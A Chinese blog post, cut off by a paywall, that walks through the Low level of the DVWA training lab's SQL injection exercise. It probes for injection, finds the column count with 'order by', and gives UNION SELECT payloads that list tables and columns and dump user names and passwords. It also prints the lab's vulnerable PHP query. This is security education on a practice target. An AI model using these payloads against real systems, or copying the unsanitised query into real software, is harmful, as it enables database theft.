DVWA系列---基于报错的SQL注入(SQL Injection)

最新推荐文章于 2024-02-04 11:47:44 发布
VIP文章 最新推荐文章于 2024-02-04 11:47:44 发布
阅读量1.2k 收藏 2
点赞数
分类专栏: # DVWA 文章标签: 安全漏洞 SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43968080/article/details/104178994
版权

文章目录


链接: SQL注入(SQL Injection)总结

1、Low

输入id为1
在这里插入图片描述
尝试通过 1’ 和 1’ and 1=1 以及 1’ and ‘1’ = '1 判断注入类型是字符型还是整型。

输入 1’ and 1=1 报错,输入1’ and ‘1’='1 查询成功
在这里插入图片描述
使用order by 查询字段数

1' order by 2 #

order by 3 报错:Unknown column '3' in 'order clause',因此使用联合查询时,只需要查询两个字段。
在这里插入图片描述
插入以下联合查询代码,查询当前数据库的表名

1' union select 1,table_name from information_schema.tables where table_schema=database() --

在这里插入图片描述
继续查询当前数据库中每张表的字段信息,在此以users表为例

1' union select 1,column_name from information_schema.columns where table_schema=database() and table_name="users" --

在这里插入图片描述
继续查询users表的数据内容

1' union select 1,concat_ws(",", first_name, last_name, user, password) from users --

在这里插入图片描述
现在看一下数据库
在这里插入图片描述
查看源码:

<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
   
    // Get input
    $id = $_REQUEST[ 'id' ];

    // Check database
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])
最低0.47元/天 解锁文章
KB-野原新之助
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web安全之DVWA--SQL注入(从低级到高级)
w17691058648x的博客
07-04 5692
SQL注入低级(low) 低级核心代码 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = ...
GitHub 读取jupyter报错Sorry, something went wrong. Reload?
12-23
GitHub 读取jupyter报错Sorry, something went wrong. Reload?
DVWA下的SQL注入
07-25
SQL
适合DVWASQL-li-lab的PHPStudy、DVWASQL-li-labs
03-26
免费的工具包,下载安装配置好即可使用,给个小赞吧。
dvwa学习之七:SQL Injection
weixin_30480583的博客
08-21 75
1.Low级别 核心代码: <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users W...
DVWA解题步骤
weixin_53549425的博客
02-04 724
可以防止XSS。
DVWA sql注入(high)
gclome的博客
07-05 4510
有了前两关的基础,现在做起来,比较得心应手了 现在开始: 1.输入1' 输入1' and '1'='1 输入1' and '1'='2 由此可见,这也是一个字符型的注入 2.获取字段数 输入1' order by 2# 输入1' order by 3# 由此可见,字段数是2, 我觉得所谓high等级较前两个的区别就是出错了之后,不再提醒错误原因,只显示Something went wrong. 3...
DVWA-SQL注入
weixin_58954236的博客
09-28 214
会在疑似注入点的地方或者参数后面尝试提交数据,从而进行判断是否存在SQL注入漏洞。
完成dvwas中sql注入模块的练习
S_cx666的博客
12-22 914
完成dvwas中sql注入模块的练习
DVWA SQL注入(低中高三级)
Yanug
09-26 1658
low级 1.先进行简单的ID查询 输入输入正确的ID,将显示ID First name,Surname信息。 2.检测是否可以注入 可知此位为注入点,输入:‘ 返回错误 3.尝试遍历数据库表,提示输入的值是ID,可以初步判断此处为数字类型的注入。 尝试输入:1 or 1=1 没有达到目的,再尝试:1' or' 1' =' 1 显示出数据库中所有内容。 4.查询字段数 1’order by...
2020-12-06-DVWAsql.md
01-24
dvwasql
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
DVWA靶场环境---新手入坑
10-28
DVWA靶场环境---新手学习web安全的必备靶场之一,DVWA (Dam Vulnerable Web Application)是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞
docker-dvwa:DVWA的Docker Compose设置
03-06
DVWA在Dockerhub上有可用的官方Docker映像,但是编写此映像时,该映像已有2年未收到任何更新。 如果您希望始终使用最新版本,请使用此处提供的Docker Compose设置。 映像将始终根据存储库的最新主分支在。 :party...
杭州电子科技大学数据结构(题目).pdf
04-26
杭州电子科技大学,期末考试资料,计算机专业期末考试试卷,试卷及答案,数据结构。
重庆大学 2010-2011(一)模拟电子技术A卷答案.pdf
最新发布
04-26
重庆大学期末考试试卷,重大期末考试试题,试题及答案
如何创意年会组织形式?.docx
04-26
年会班会资料,节目策划,游戏策划,策划案,策划方案,活动方案,筹办,公司年会,开场白,主持人,策划主题,主持词,小游戏。
基于Django框架的博客系统.zip
04-26
基于Django框架的博客系统.zip
dvwa sql injection
03-16
DVWA (Damn Vulnerable Web Application) 是一个用于演示 web 应用程序漏洞的模拟环境。其中之一的漏洞是 SQL 注入攻击。它允许攻击者在 web 应用程序的数据库后面执行非法的 SQL 命令,从而访问敏感信息或控制系统。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值